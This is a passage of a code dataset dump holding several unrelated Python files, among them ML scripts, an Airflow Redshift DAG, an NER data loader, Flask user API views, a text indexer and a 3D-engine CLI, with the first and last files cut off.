model_selection.KFold(n_splits=10, random_state=seed)\n # cv_results = model_selection.cross_val_score(model, X, Y, cv=kfold, scoring=scoring)\n\n my_scorer = make_scorer(get_gain, greater_is_better=True)\n cv_results = model_selection.cross_val_score(model, X, Y, cv=kfold, scoring=my_scorer)\n\n results.append(cv_results)\n names.append(name)\n msg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\n print(msg)\n# boxplot algorithm comparison\nfig = plt.figure()\nfig.suptitle('Algorithm Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results)\nax.set_xticklabels(names)\nplt.show()\n","sub_path":"tools/classifier_comparison.py","file_name":"classifier_comparison.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104258830","text":"\"\"\"\nCreated on Tue Apr 25 11:46:31 2017\n\n@author: lansford\n\"\"\"\n\nfrom __future__ import division\nimport os\nimport pickle\nfrom timeit import default_timer as timer\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPRegressor\nfrom ir_gen import IR_GEN\n\"\"\"loading model files\"\"\"\npickleLoc = os.path.expanduser('~/Box Sync/Synced_Files/Coding/Research/IR_project/Data/COsite_NN.pkl')\ninfile = open(pickleLoc,'rb')\nCOsite_NN = pickle.load(infile) #encoding = 'latin1' if python3\ninfile.close()\nspectrum = np.linspace(200,2200,num=501,endpoint=True)\n\n\"\"\"loading Spectrum files\"\"\"\nSingleCOLoc = os.path.expanduser('~/Documents/VASP/Testing IR/Vibration_Lists/old/SingleCO_200plus.pkl')\ninfile = open(SingleCOLoc, 'rb')\nSingleCO = pickle.load(infile) #encoding = 'latin1' if pyton3\ninfile.close()\n\nLoadIndex = os.path.expanduser('~/Documents/VASP/Testing IR/Vibration_Lists/old/CNCOtrain_test_all_200plus.pkl')\ninfile = open(LoadIndex, 'rb')\nLoadIndex = pickle.load(infile) #encoding = 'latin1' if pyton3\ninfile.close()\n\nfor i in SingleCO:\n if i[0].CNCO == 5 or i[0].CNCO == 0:\n i[0].CNCO = 4\nCNCOList = [i[0].CNCO for i in SingleCO]\nCNCOList = np.array(CNCOList)\nXfreq = np.array([np.real(i[0].frequencies) for i in SingleCO])\nXint = np.array([i[0].intensities for i in SingleCO])\nX = np.array([np.array((Xfreq[i], Xint[i])) for i in range(len(SingleCO))])\ny = CNCOList\nCNconv = IR_GEN(4)\nprobabilities = CNconv.get_probabilities((11, 6, 3))\nXconv_test, yconv_test = CNconv.get_xyconv(X[LoadIndex[1]], y[LoadIndex[1]], probabilities)\n\nspectrum = np.linspace(200,2200,num=501,endpoint=True)\n\nXconv_plot = [Xconv_test[i] for i in range(len(probabilities)) if min(probabilities[i])>0.05][3]\nyconv_plot = [yconv_test[i] for i in range(len(probabilities)) if min(probabilities[i])>0.05][3]\nyplotpredict = COsite_NN.predict(Xconv_plot.reshape(1,-1))[0]\nimport matplotlib.pyplot as plt\nplt.figure(5,figsize=(9,5))\nplt.plot(spectrum,Xconv_plot,lw=3)\nplt.xlabel('Frequency [cm$^{-1}$]',size=20)\nplt.ylabel('Relative Intensity',size=20)\nplt.xlim([200,2200])\nplt.tick_params(axis='both', which='major', labelsize=16)\nplt.gcf().subplots_adjust(bottom=0.14)\nplt.gcf().subplots_adjust(top=0.99)\nplt.gcf().subplots_adjust(left=0.10)\nplt.gcf().subplots_adjust(right=0.99)\nprint(yconv_plot)\nprint(yplotpredict)","sub_path":"Generate_Figures.py","file_name":"Generate_Figures.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"15452703","text":"from datetime import datetime, timedelta\nimport os\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, RowCountOperator, NullPercentOperator, PostGresOperator)\nfrom helpers import SqlQueries\n#AWS_KEY = os.environ.get('AWS_KEY')\n#AWS_SECRET = os.environ.get('AWS_SECRET')\n\ndefault_args = {\n 'owner': 'rohan',\n 'start_date': datetime(2020, 1, 1),\n 'end_date': datetime(2020, 2, 1),\n 'depends_on_past': False,\n 'retries': 3,\n 'retry_delay': timedelta(minutes=2),\n 'catchup': True,\n 'email_on_retry': False\n}\n\ndag = DAG('udac_example_dag',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='@daily',\n max_active_runs=1\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_blocks_to_redshift = StageToRedshiftOperator(\n task_id='Stage_blocks',\n dag=dag,\n table='staging_blocks',\n redshift_conn_id=\"redshift_id\",\n aws_credentials_id=\"aws_credentials\",\n s3_bucket=\"rk-blockchain-db\",\n s3_key=\"block\",\n ftype='CSV',\n region='us-east-1',\n backfill_execution_date=True\n)\n\nstage_transaction_to_redshift = StageToRedshiftOperator(\n task_id='Stage_transactions',\n dag=dag,\n table='staging_transactions',\n redshift_conn_id=\"redshift_id\",\n aws_credentials_id=\"aws_credentials\",\n s3_bucket=\"rk-blockchain-db\",\n s3_key=\"transaction\",\n ftype='CSV',\n region='us-east-1',\n backfill_execution_date=True\n)\n\nstage_prices_to_redshift = StageToRedshiftOperator(\n task_id='Stage_prices',\n dag=dag,\n table='staging_prices',\n redshift_conn_id=\"redshift_id\",\n aws_credentials_id=\"aws_credentials\",\n s3_bucket=\"rk-blockchain-db\",\n s3_key=\"price\",\n ftype='JSON',\n ignore_headers=0,\n region='us-east-1',\n backfill_execution_date=True\n)\n\n\nload_block_transaction_table = LoadFactOperator(\n task_id='Load_block_transaction_fact_table',\n dag=dag,\n redshift_conn_id='redshift_id',\n sql_query=SqlQueries.block_transaction_table_insert\n)\n\nload_block_dimension_table = LoadDimensionOperator(\n task_id='Load_block_dim_table',\n dag=dag,\n redshift_conn_id='redshift_id',\n table=\"block\",\n sql_query=SqlQueries.block_table_insert\n)\n\nload_transaction_dimension_table = LoadDimensionOperator(\n task_id='Load_transaction_dim_table',\n dag=dag,\n redshift_conn_id='redshift_id',\n table=\"transactions\",\n sql_query=SqlQueries.transaction_table_insert\n)\n\nload_price_dimension_table = LoadDimensionOperator(\n task_id='Load_price_dim_table',\n dag=dag,\n redshift_conn_id='redshift_id',\n table=\"price\",\n sql_query=SqlQueries.price_table_insert\n)\n\nrun_quality_checks_row_count = RowCountOperator(\n task_id='Run_data_quality_checks_row_cnt',\n dag=dag,\n redshift_conn_id='redshift_id',\n tables=[\"transactions\", \"block\", \"block_transaction\", \"price\"]\n)\n\nrun_quality_checks_null_per = NullPercentOperator(\n task_id='Run_data_quality_checks_null_per',\n dag=dag,\n redshift_conn_id='redshift_id',\n tables=[ \"block_transaction\"]\n)\n\nend_operator = DummyOperator(task_id='Stop_execution', dag=dag)\n\nstart_operator>> stage_blocks_to_redshift\nstart_operator>> stage_transaction_to_redshift\nstart_operator>> stage_prices_to_redshift\n\n[stage_blocks_to_redshift, stage_transaction_to_redshift, stage_prices_to_redshift] >> load_block_transaction_table\n\nload_block_transaction_table >> load_transaction_dimension_table\nload_block_transaction_table >> load_block_dimension_table\nload_block_transaction_table >> load_price_dimension_table\n\nload_transaction_dimension_table >> run_quality_checks_row_count\nload_block_dimension_table >> run_quality_checks_row_count\nload_price_dimension_table >> run_quality_checks_row_count\n\nrun_quality_checks_row_count >> run_quality_checks_null_per >> end_operator\n\n\n\n\n\n\n","sub_path":"airflow/dags/udac_example_dag.py","file_name":"udac_example_dag.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"457455247","text":"import os\nimport re\nimport json\nfrom collections import Counter, OrderedDict\n\nfrom tqdm import tqdm_notebook as log_progress\n\nfrom natasha.utils import Record\nfrom natasha import NamesExtractor\nfrom natasha.markup import show_markup\n\n\nFACTRU_DIR = 'factRuEval-2016'\nDEVSET_DIR = os.path.join(FACTRU_DIR, 'devset')\nTESTSET_DIR = os.path.join(FACTRU_DIR, 'testset')\n\n\nclass Span(Record):\n __attributes__ = ['id', 'type', 'start', 'stop']\n\n def __init__(self, id, type, start, stop):\n self.id = id\n self.type = type\n self.start = start\n self.stop = stop\n\n\nclass Entity(Record):\n __attributes__ = ['id', 'type', 'spans']\n\n def __init__(self, id, type, spans):\n self.id = id\n self.type = type\n self.spans = spans\n\n\nclass Coref(Record):\n __attributes__ = ['id', 'entities', 'normalized']\n\n def __init__(self, id, entities, normalized):\n self.id = id\n self.entities = entities\n self.normalized = normalized\n\n\nclass Token(Record):\n __attributes__ = ['value', 'start', 'stop']\n\n def __init__(self, value, start, stop):\n self.value = value\n self.start = start\n self.stop = stop\n\n @property\n def as_json(self):\n return [self.value, self.start, self.stop]\n\n @property\n def span(self):\n return self.start, self.stop\n\n def shifted(self, shift):\n return Token(\n self.value,\n self.start + shift,\n self.stop + shift\n )\n\n\nclass Name(Record):\n __attributes__ = ['first', 'middle', 'last', 'nick']\n\n def __init__(self, first, middle, last, nick):\n self.first = first\n self.middle = middle\n self.last = last\n self.nick = nick\n\n @property\n def as_json(self):\n data = OrderedDict()\n for key in self.__attributes__:\n value = getattr(self, key)\n if value is not None:\n data[key] = value.as_json\n return data\n\n @property\n def span(self):\n starts = []\n stops = []\n for token in self:\n if token:\n starts.append(token.start)\n stops.append(token.stop)\n return min(starts), max(stops)\n\n def shifted(self, shift):\n tokens = [\n (_.shifted(shift) if _ else _)\n for _ in self\n ]\n return Name(*tokens)\n\n\nclass NamePart(Record):\n __attributes__ = ['type', 'token']\n\n def __init__(self, type, token):\n self.type = type\n self.token = token\n\n\nclass ComplexName(Record):\n __attributes__ = ['parts']\n\n def __init__(self, parts):\n self.parts = parts\n\n\nclass CoreferenceGroup(Record):\n __attributes__ = ['normalized', 'items']\n\n def __init__(self, normalized, items):\n self.normalized = normalized\n self.items = items\n\n\nclass Test(Record):\n __attributes__ = ['text', 'names']\n\n def __init__(self, text, names):\n self.text = text\n self.names = names\n\n\ndef load_text(path):\n with open(path) as file:\n return file.read()\n\n\ndef load_factru_doc(id, extension):\n for dir in [DEVSET_DIR, TESTSET_DIR]:\n filename = 'book_{id}.{extension}'.format(\n id=id,\n extension=extension\n )\n path = os.path.join(dir, filename)\n if os.path.exists(path):\n return load_text(path)\n\n\ndef load_factru_text(id):\n return load_factru_doc(id, 'txt')\n\n\ndef list_factru_ids(dir=None):\n if dir is None:\n dirs = [DEVSET_DIR, TESTSET_DIR]\n else:\n dirs = [dir]\n for dir in dirs:\n for filename in os.listdir(dir):\n match = re.match('book_(\\d+)\\.txt', filename)\n if match:\n id = int(match.group(1))\n yield id\n\n\n# [('loc_name', 2434),\n# ('org_name', 2265),\n# ('surname', 1959),\n# ('org_descr', 1684),\n# ('job', 1386),\n# ('name', 1341),\n# ('loc_descr', 321),\n# ('geo_adj', 220),\n# ('nickname', 68),\n# ('patronymic', 42),\n# ('prj_name', 22),\n# ('prj_descr', 10),\n# ('facility_descr', 2)]\n\n\ndef parse_factru_spans(text):\n for line in text.splitlines():\n match = re.match('^(\\d+) ([^ ]+) (\\d+) (\\d+)[^$]+$', line)\n id, type, start, size = match.groups()\n id = int(id)\n start = int(start)\n size = int(size)\n yield Span(id, type, start, start + size)\n\n\ndef load_factru_spans(id):\n text = load_factru_doc(id, 'spans')\n return parse_factru_spans(text)\n\n\n# [('Org', 2821),\n# ('Person', 2129),\n# ('LocOrg', 1399),\n# ('Location', 1257),\n# ('Project', 22),\n# ('Facility', 2)]\n\n\ndef parse_factru_entities(text):\n for line in text.splitlines():\n match = re.match('^(\\d+) ([^ ]+) ([\\d ]+)[^$]+$', line)\n id, type, spans = match.groups()\n id = int(id)\n spans = [int(_) for _ in spans.split()]\n yield Entity(id, type, spans)\n\n\ndef load_factru_entities(id):\n text = load_factru_doc(id, 'objects')\n return parse_factru_entities(text)\n\n\ndef parse_factru_corefs(text):\n id = None\n entities = None\n normalized = {}\n for line in text.splitlines():\n if not line:\n yield Coref(id, entities, normalized)\n id = None\n entities = None\n normalized = {}\n else:\n match = re.match('^(\\d+) ([\\d ]+)$', line)\n if match:\n id, entities = match.groups()\n id = int(id)\n entities = [int(_) for _ in entities.split()]\n else:\n key, value = line.split(' ', 1)\n normalized[key] = value\n\n\ndef load_factru_corefs(id):\n text = load_factru_doc(id, 'coref')\n return parse_factru_corefs(text)\n\n\ndef span_token(text, span):\n start = span.start\n stop = span.stop\n value = text[start:stop]\n return Token(value, start, stop)\n\n\ndef prepare_name_part(text, span):\n type = span.type\n token = span_token(text, span)\n return NamePart(type, token)\n\n\ndef prepare_name(text, spans):\n counts = Counter(_.type for _ in spans)\n assert set(counts.keys()) <= {'name', 'patronymic', 'surname', 'nickname'}\n if all(_ == 1 for _ in counts.values()):\n mapping = {\n _.type: span_token(text, _)\n for _ in spans\n }\n return Name(\n mapping.get('name'),\n mapping.get('patronymic'),\n mapping.get('surname'),\n mapping.get('nickname')\n )\n else:\n parts = [prepare_name_part(text, _) for _ in spans]\n return ComplexName(parts)\n\n\ndef prepare_entity(id, text, id_entities, id_spans):\n entity = id_entities[id]\n spans = [id_spans[_] for _ in entity.spans]\n if entity.type == 'Person':\n return prepare_name(text, spans)\n\n\ndef prepare_normalized_name(data):\n if set(data) <= {\n 'firstname',\n 'lastname',\n 'wikidata',\n 'patronymic',\n 'nickname'\n }:\n return Name(\n data.get('firstname'),\n data.get('patronymic'),\n data.get('lastname'),\n data.get('nickname')\n )\n else:\n parts = [\n NamePart(_, data[_])\n for _ in data\n ]\n return ComplexName(parts)\n\n\ndef load_factru(id):\n text = load_factru_text(id)\n spans = list(load_factru_spans(id))\n corefs = list(load_factru_corefs(id))\n entities = list(load_factru_entities(id))\n id_spans = {_.id: _ for _ in spans}\n id_entities = {_.id: _ for _ in entities}\n for coref in corefs:\n normalized = prepare_normalized_name(coref.normalized)\n items = [\n prepare_entity(_, text, id_entities, id_spans)\n for _ in coref.entities\n ]\n if all(items):\n yield CoreferenceGroup(normalized, items)\n\n\ndef dump_json(data, path):\n with open(path, 'w') as file:\n dump = json.dumps(data, ensure_ascii=False, indent=4)\n file.write(dump)\n\n\ndef get_line_tokens(text):\n for match in re.finditer('([^\\n]+)', text):\n value = match.group(1)\n start = match.start()\n stop = match.end()\n yield Token(value, start, stop)\n\n\ndef is_inside(a, b):\n a_start, a_stop = a\n b_start, b_stop = b\n return a_start >= b_start and a_stop <= b_stop\n\n\ndef split_test(test):\n text, names = test\n for line in get_line_tokens(text):\n items = []\n for name in names:\n if is_inside(name.span, line.span):\n items.append(name.shifted(-line.start))\n yield Test(line.value, items)\n","sub_path":"natasha/tests/name/factRuEval/generate/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"136750772","text":"#!/usr/bin/python3\n\"\"\"User page for flask that displays class user.\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models import storage\nfrom models.user import User\n\n\n@app_views.route(\"/users\", methods=['GET'], strict_slashes=False)\ndef get_all_users():\n \"\"\" This function retrieves all users. Has no parameters. \"\"\"\n users_dict = []\n all_object_dict = storage.all(User).values()\n for value in all_object_dict:\n users_dict.append(value.to_dict())\n return jsonify(users_dict)\n\n\n@app_views.route(\"/users/\", methods=['GET'],\n strict_slashes=False)\ndef get_id_user(user_id):\n \"\"\" This function retrieves one user given an id.\n user_id → Id of the requested User.\n \"\"\"\n object_dict = storage.get(\"User\", user_id)\n if object_dict:\n return jsonify(object_dict.to_dict())\n abort(404)\n\n\n@app_views.route(\"/users/\", methods=['DELETE'],\n strict_slashes=False)\ndef delete_an_user(user_id):\n \"\"\" This function retrieves one user given an id and\n deletes it.\n user_id → Id of user to delete.\n returns an empty dictionary on success.\n raises a 404 error if user doesn't exists.\n \"\"\"\n object_dict = storage.get(\"User\", user_id)\n if object_dict:\n object_dict.delete()\n storage.save()\n return make_response(jsonify({}), 200)\n abort(404)\n\n\n@app_views.route(\"/users/\", methods=['POST'], strict_slashes=False)\ndef create_user():\n \"\"\" This function creates a new user. \"\"\"\n new_user = request.get_json()\n if not new_user:\n abort(400, \"Not a JSON\")\n\n if not new_user.get(\"email\"):\n abort(400, \"Missing email\")\n\n if not new_user.get(\"password\"):\n abort(400, \"Missing password\")\n\n user = User(**new_user)\n storage.new(user)\n storage.save()\n return make_response(jsonify(user.to_dict()), 201)\n\n\n@app_views.route(\"/users/\", methods=['PUT'],\n strict_slashes=False)\ndef update_user(user_id):\n \"\"\" This function updates a user. \"\"\"\n user_update = request.get_json()\n if not user_update:\n abort(400, \"Not a JSON\")\n\n object_ = storage.get(\"User\", user_id)\n if object_:\n ignored_attr = [\"id\", \"created_at\", \"updated_at\"]\n for key, value in user_update.items():\n if key not in ignored_attr:\n setattr(object_, key, value)\n\n object_.save()\n storage.save()\n return make_response(jsonify(object_.to_dict()), 200)\n abort(404)\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"190427559","text":"import wave, struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\n#import fft\nimport wavelet\n\n#-------------------------------------------------------------------------------\n# Read wave file and return both channels\n#-------------------------------------------------------------------------------\ndef read_wav(filename):\n wave_file = wave.open(filename, 'r')\n (nchannels, sampwidth, framerate, nframes, comptype, compname) = wave_file.getparams ()\n \n frames = wave_file.readframes(nframes * nchannels)\n # Convert from hexa to string\n out = struct.unpack_from (\"%dh\" % nframes * nchannels, frames)\n \n # Convert 2 channels to numpy arrays\n if nchannels == 2:\n left = np.array (list (out[0::2]))\n right = np.array (list (out[1::2]))\n else:\n left = np.array (out)\n right = left\n wave_file.close()\n return left,right,framerate\n\ndef simple_ex(fig):\n ax = fig.add_subplot(2, 1, 1)\n x = np.arange(0,10,np.exp2(-10))\n f = [np.sin(2*cur)+np.cos(3*cur) for cur in x]\n ax.plot(x,f)\n wavlt = wavelet.wvlt(f)\n c = wavlt.haar(1)\n cx = fig.add_subplot(2, 1, 2)\n cx.plot(c)\n\n#def comparison(fig):\n# ax = fig.add_subplot(3, 1, 1)\n# ax.plot(chan1)\n# \n# wavlt = wavelet.wvlt(chan1)\n# s,d = wavlt.haar(2)\n#\n# bx = fig.add_subplot(3, 1, 2)\n# #spectrogram = pylab.specgram(chan1, Fs = fps, scale_by_freq=True,sides='default')\n# bx.plot(s)\n# \n# cx = fig.add_subplot(3, 1, 3)\n# cx.plot(d)\n# \n# #c = np.fft.fft(chan1)\n# #cx.plot(c[0:len(c)/100])\n \n\n#-------------------------------------------------------------------------------\n#-------------------------------------------------------------------------------\n\nchan1,chan2,fps = read_wav('piano1.wav')\n\n#simple_ex(fig)\n#comparison(fig)\nwavlt = wavelet.wvlt(chan1)\nwavlt.haar(7)\nwavlt.plot()\n","sub_path":"sound_recognition/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"190290921","text":"'''\r\n模拟浏览器访问网页\r\n'''\r\n#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport webbrowser\r\nimport re\r\nimport os\r\nfrom urllib import request\r\nfrom urllib.parse import urljoin\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nURL_HOME = [('http://blog.csdn.net/windeal3203?viewmode=contents',\r\n ']+\"cate_menu_lk\" href=[\"\\'](.*?)[\"\\']'),\r\n ('http://www.baidu.com', ']+\"cate_menu_lk\" href=[\"\\'](.*?)[\"\\']')]\r\n\r\ndef access_url_list(url_list):\r\n '''\r\n 访问url_list中的所有url\r\n '''\r\n for index, url in enumerate(url_list):\r\n if index % 5 == 0:\r\n os.system(\"killall firefox\")\r\n time.sleep(3)\r\n print('test %s' % url)\r\n webbrowser.open(url, new=0)\r\n time.sleep(3)\r\n\r\ndef scrap_url_list(url, url_regex):\r\n '''\r\n 从url页面获取最多20条的url,\r\n 返回url列表\r\n '''\r\n link_regex = re.compile(url_regex)\r\n req = request.urlopen(url)\r\n html = req.read().decode('utf-8')\r\n links = link_regex.findall(str(html))\r\n for index, link in enumerate(links):\r\n links[index] = urljoin(url, link)\r\n if len(links) > 6:\r\n links = links[0:6]\r\n return links\r\n\r\ndef get_article_links(url):\r\n '''\r\n 获取本页中文章列表中所有文章的链接\r\n '''\r\n links = []\r\n req = request.urlopen(url)\r\n html = req.read().decode('utf-8')\r\n soup = BeautifulSoup(html, \"html.parser\")\r\n title_span_all = soup.find_all(\"span\", class_='link_title')\r\n for title_span in title_span_all:\r\n link = title_span.find_next(\"a\").get(\"href\")\r\n link = urljoin(url, link)\r\n links.append(link)\r\n return links\r\n\r\ndef main():\r\n ''' main()\r\n '''\r\n links = get_article_links(URL_HOME[0][0])\r\n# links = scrap_url_list(URL_HOME[0][0], URL_HOME[0][1])\r\n print(links)\r\n access_url_list(links)\r\n time.sleep(5)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"python/tools/access_web.py","file_name":"access_web.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"276474383","text":"import re\nimport string\nfrom stemming.porter import stem\n\nSTOPWORDS = ['i', 'a', 'about', 'an', 'are', 'as', 'at', 'be', 'by', 'com', 'for', 'from', 'how', 'in', 'is', 'it', 'of', 'on', 'or', 'that', 'the', 'this', 'to', 'was', 'what', 'when', 'where', 'who', 'will', 'with', 'the']\n\ndef contruct_index():\n index = {}\n with open('the new testament.txt', 'r') as f:\n doc_id = 0\n prev_chapter = ''\n for line in f.readlines():\n if line != '\\n':\n split_line = line.split()\n first_word = split_line[0]\n if is_chapter_verse(first_word):\n chapter = first_word.split(':')[0]\n # Si comienza un nuevo capitulo, cambia el doc_id\n if chapter != prev_chapter:\n doc_id += 1\n prev_chapter = chapter\n words = split_line[1:]\n else:\n words = split_line\n for word in words:\n if not is_chapter_verse(word):\n token = tokenize(word)\n if token not in STOPWORDS:\n term = stem(token)\n if term in index:\n index[term].append(doc_id)\n else:\n index[term] = [doc_id]\n return index\n\ndef tokenize(word):\n transtable = str.maketrans('', '', string.punctuation)\n token = word.translate(transtable).lower()\n return token\n\ndef is_chapter_verse(word):\n if re.match('[0-9]+:[0-9]+', word):\n return True\n return False\n \n \n \n#PARTE DE PERMUTERMINOS:\n#-Diego-\ndef get_permuterminos(word):\n res = []\n word+=\"$\"\n for i in range(len(word)):\n temp = word[i:len(word)]+word[0:i]\n res.append(temp)\n return res\n\ndef get_word(permutermino):\n pos = permutermino.find(\"$\")\n if(pos != -1):\n return permutermino[pos+1:len(permutermino)] + permutermino[0:pos]\n else:\n return permutermino\n \ndef create_index_permuterminos(index):\n res = []\n for palabra in index:\n permuterminos = get_permuterminos(palabra)\n for perm in permuterminos:\n res.append(perm)\n return res\n\ndef find_by_permutermino(permindex,word):\n word = word.lower()\n res = []\n\n #CASO X\n if re.match(\"^[a-z]+$\",word):\n for p in permindex:\n if (p.find(word+\"$\") == 0):\n if (p[len(p)-1] == \"$\"):\n res.append(get_word(p))\n\n \n #CASO X*\n if re.match(\"^[a-z]+\\*$\",word):\n for p in permindex:\n if (p.find(\"$\"+word[0:len(word)-1]) == 0):\n res.append(get_word(p))\n\n #CASO *X\n if re.match(\"^\\*[a-z]+$\",word):\n for p in permindex:\n if (p.find(word[1:len(word)]+\"$\") == 0):\n res.append(get_word(p))\n \n #CASO *X*\n if re.match(\"^\\*[a-z]+\\*$\",word):\n for p in permindex:\n if (p.find(word[1:len(word)-1]) == 0):\n res.append(get_word(p)) \n \n #CASO X*Y\n if re.match(\"^[a-z]+\\*[a-z]+$\",word):\n for p in permindex:\n pos = word.find(\"*\")\n if (p.find(word[pos+1:len(word)]+\"$\"+word[0:pos]) == 0):\n res.append(get_word(p))\n \n return res\n","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"532217606","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/dauptain/GITLAB/tiny_3d_engine/src/tiny_3d_engine/cli.py\n# Compiled at: 2020-04-23 02:22:19\n# Size of source mod 2**32: 2506 bytes\n\"\"\" command line of Tiny 3D engine\"\"\"\nimport click\nfrom tiny_3d_engine.examples.geoload import spawngeo\nfrom tiny_3d_engine.examples.rabbit import spawnrabbit\nfrom tiny_3d_engine.examples.benchmark import benchmark\n\n@click.group()\ndef main_cli():\n \"\"\"--------------- TINY_3D_ENGINE --------------------\n\nYou are now using the Command line interface of Tiny 3D engine,\na Python3 Tkinter lightweight 3D engine, created at CERFACS (https://cerfacs.fr).\n\nThis package is mean to be used as a dependency of other packages,\nto provide a light 3D feedback for small 3D scenes <100 000 polygons.\nThis CLI is given here for developers perusal and demonstrations.\nFind the script of these small tools in the /examples folder of the package.\n\nThis is a python package currently installed in your python environement.\nSee the full documentation at : https://tiny-3d-engine.readthedocs.io/en/latest/.\n\nDISCLAIMER: Tiny 3D engine is a brute force flat renderer.\nAs it is NOT using your graphical card, \ndo not excpect anything fancier than a 1980 video game.\n\n\"\"\"\n pass\n\n\n@click.command()\n@click.argument('filename', nargs=1)\ndef load(filename):\n \"\"\"Load a 3D scene from FILENAME.\n\n Currently ENSIGHT .geo files are supported,\n with elements bar2, tri3, quad4\n as well as .ply files , for triangles only.\n \"\"\"\n spawngeo(filename)\n\n\nmain_cli.add_command(load)\n\n@click.command()\ndef bench():\n \"\"\"Run a short benchmark on your machine.\n \n The bench tests an increasing amount of elements bar2, tri3 and quad3, \n until the final rendering time is over .1 second.\n \"\"\"\n benchmark()\n\n\nmain_cli.add_command(bench)\n\n@click.command()\n@click.option('--shading',\n type=click.Choice([\n 'none', 'linear', 'radial', 'flat'],\n case_sensitive=False),\n default='flat')\n@click.option('--version',\n type=(click.Choice([\n '4', '3', '2'])),\n default='4',\n help='Coarse resolution (4) to mild resolution (2).')\ndef rabbit(shading, version):\n \"\"\"Run a demo with the Stanford Rabbit.\n \n (| (|\n\n ( -.-)\n\n o_(\")(\")\n\n SHADING flag will control the shading applied.\n\n VERSION: Three Standord rabbit versions are included:\n\n 4 coarse resolution - 948 faces\n\n 3 low resolution - 3851 faces\n\n 2 mild resolution - 16301 faces\n\n the higest resolution circa 70000 faces was not included\n to keep the repository light enough.\n\n \"\"\"\n spawnrabbit(shading, version)\n\n\nmain_cli.add_command(rabbit)","sub_path":"pycfiles/tiny_3d_engine-0.2.0-py3-none-any/cli.cpython-36.py","file_name":"cli.cpython-36.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246540861","text":"import networkx\n\nfrom .base import BaseParser\nfrom ..exceptions import NetParserException\n\n\nclass OlsrParser(BaseParser):\n \"\"\" OLSR 0.6.x parser \"\"\"\n protocol = 'OLSR'\n version = '0.6'\n metric = 'ETX'\n\n def parse(self, data):\n \"\"\"\n Converts a dict representing an OLSR 0.6.x topology in a NetworkX Graph object.\n \"\"\"\n graph = networkx.Graph()\n if 'topology' not in data:\n raise NetParserException('Parse error, \"topology\" key not found')\n # loop over topology section and create networkx graph\n for link in data[\"topology\"]:\n try:\n source = link[\"lastHopIP\"]\n dest = link[\"destinationIP\"]\n cost = link[\"tcEdgeCost\"]\n except KeyError as e:\n raise NetParserException('Parse error, \"%s\" key not found' % e)\n # original olsrd cost (jsoninfo multiplies by 1024)\n cost = float(cost / 1024)\n # add link to Graph\n graph.add_edge(source, dest, weight=cost)\n self.graph = graph\n # determine version and revision\n if 'config' in data:\n version_info = data['config']['olsrdVersion'].replace(' ', '').split('-')\n self.version = version_info[1]\n # try to get only the git hash\n if 'hash_' in version_info[-1]:\n version_info[-1] = version_info[-1].split('hash_')[-1]\n self.revision = version_info[-1]\n","sub_path":"netdiff/parsers/olsr.py","file_name":"olsr.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"618576032","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\n\nDIR = 'DATA_DIRECTORY'\nTITLES_INITIAL_TRAINING_DATA = ['STUDENTID', 'SCORE', 'GRADE', 'ASKQUESTION', 'TEXTINGINCLASS', 'LATEINCLASS']\nTITLES_INITIAL_TESTING_DATA \\\n = ['STUDENTID', 'SCORE', 'GRADE', 'ON_SMARTPHONE', 'ASKS_QUESTIONS', 'LATE_IN_CLASS']\n\ninitial_training_data = pd.read_csv(DIR + '/moody_training_data.csv')\ninit_testing_data = pd.read_csv(DIR + '/moody_testing_data.csv')\n\n\n# drop the leaves_early column as there is no comparable data within the training set available\ninitial_testing_data = init_testing_data.drop(columns=['LEAVES_EARLY'])\n\n# convert all data to numbers\ninitial_transposed_training_data = initial_training_data.values.transpose()\ninitial_transposed_testing_data = initial_testing_data.values.transpose()\n\n\ndef covert_grade_to_number(data_of_interest, transposed):\n for i in range(0, data_of_interest.shape[0]):\n if transposed[2][i] == 'A':\n transposed[2][i] = 1\n if transposed[2][i] == 'B':\n 